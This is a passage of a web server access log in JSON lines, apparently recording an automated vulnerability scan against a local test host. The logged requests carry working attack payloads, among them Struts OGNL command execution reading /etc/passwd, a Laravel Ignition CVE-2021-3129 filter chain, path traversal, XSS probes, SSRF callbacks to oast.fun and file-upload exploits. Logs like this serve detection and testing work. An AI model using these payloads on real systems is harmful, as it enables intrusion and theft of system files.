Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/nodes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aplicacao/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"------WebKitFormBoundaryl7d1B1aGsV2wcZwF\x0D\x0AContent-Disposition: form-data; name=\x22id\x22\x0D\x0A\x0D\x0A%{\x0D\x0A(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\x0D\x0A(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\x0D\x0A(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\x0D\x0A(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\x0D\x0A(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\x0D\x0A(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\x0D\x0A}\x0D\x0A\x0D\x0A------WebKitFormBoundaryl7d1B1aGsV2wcZwF\xE2\x80\x94\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/images/MyVue/MyVueHelp.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /m_login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ImageUrl=http://c9v8h8gsmpv8c1qg07h0xzojdjyjg59xw.oast.fun&ProviderName=TheMovieDB HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE=%C3%82%7B%7BVS%C3%82%7D%7D&__VIEWSTATEGENERATOR=%C3%82%7B%7BVSG%C3%82%7D%7D&__EVENTVALIDATION=%C3%82%7B%7BEV%C3%82%7D%7D&txtID=uname%27&txtPW=passwd&hdnClientDPI=96","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"------WebKitFormBoundaryKc8fBVDo558U4hbJ\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22297MTzIKuMehjP4clupBADcg1ea.php\x22\x0D\x0A\x0D\x0A297MTvJUZNGvHtj3Sta4al2P33D\x0D\x0A\x0D\x0A------WebKitFormBoundaryKc8fBVDo558U4hbJ\x0D\x0AContent-Disposition: form-data; name=\x22name\x22\x0D\x0A\x0D\x0A297MTzIKuMehjP4clupBADcg1ea.php\x5Cx0A\x0D\x0A------WebKitFormBoundaryKc8fBVDo558U4hbJ--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cloudexp/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DnnImageHandler.ashx?mode=file&url=http://c9v8h88smpv8c1ig07h0ddry51c9gat6g.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webtools/control/main HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userportal/Controller?mode=8700&operation=1&datagrid=179&json={\x22\xF0\x9F\xA6\x9E\x22:\x22test\x22} HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MTzIKuMehjP4clupBADcg1ea.php%5Cx0A HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proftpd.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22arlpass\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.180","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /puppet-ca/v1/certificate_request/297MTqUK3EZbxwyiy5LpKDe0ouO HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.186","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status?full HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testrail/files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v3/settings/first-login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22AA\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantis/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mstore-api/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm/file.cgi?next_file=%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"\x0D\x0A\x0D\x0A find_profile\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A name\x0D\x0A \x0D\x0A *\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /users/user-dark-features HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.198","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22reqid\x22\x0D\x0A\x0D\x0A17457a1fe6959\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22cmd\x22\x0D\x0A\x0D\x0Aupload\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22target\x22\x0D\x0A\x0D\x0Al1_Lw\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22mtime[]\x22\x0D\x0A\x0D\x0A1576045135\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22upload[]\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0Apoc-test\x0D\x0A--------------------------ca81ac1fececda48--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/services HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=0